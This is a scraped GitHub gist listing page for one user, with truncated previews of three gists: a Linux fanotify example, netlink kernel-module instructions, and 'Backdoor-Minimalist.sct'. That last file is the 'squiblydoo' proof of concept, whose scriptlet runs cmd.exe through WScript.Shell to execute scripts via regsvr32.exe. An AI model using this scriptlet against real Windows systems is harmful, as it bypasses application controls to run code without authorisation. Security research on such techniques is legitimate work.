elgolondrino
elgolondrino
/ fanotify-example.c
Created
September 25, 2016 19:09
— forked from jaypeche/fanotify-example.c
fanotify example
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * File: fanotify-example.c | |
| * Date: Fri Nov 15 14:55:49 2013 | |
| * Author: Aleksander Morgado <aleksander@lanedo.com> | |
| * | |
| * A simple tester of fanotify in the Linux kernel. | |
| * | |
| * This program is released in the Public Domain. | |
| * | |
| * Compile with: |
elgolondrino
/ Instructions
Created
July 16, 2016 19:19
— forked from arunk-s/Instructions for running netlink example code in c
netlink example code in c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Execute make first. This will result in a netlinkKernel.ko output among many others. | |
| 2. Execute $ gcc netlinkUser.c -o netlinkUser | |
| 3. Insert kernel module by :$ sudo insmod netlinkKernel.ko | |
| 4. Run ./netlinkUser to see message and run dmesg to see debug messages | |
| 5. Remove module by : $ sudo rmmod netlinkKernel | |
| 6. Finally make clean to remove output files. |
elgolondrino
/ Backdoor-Minimalist.sct
Created
April 22, 2016 14:46
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="Empire" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); |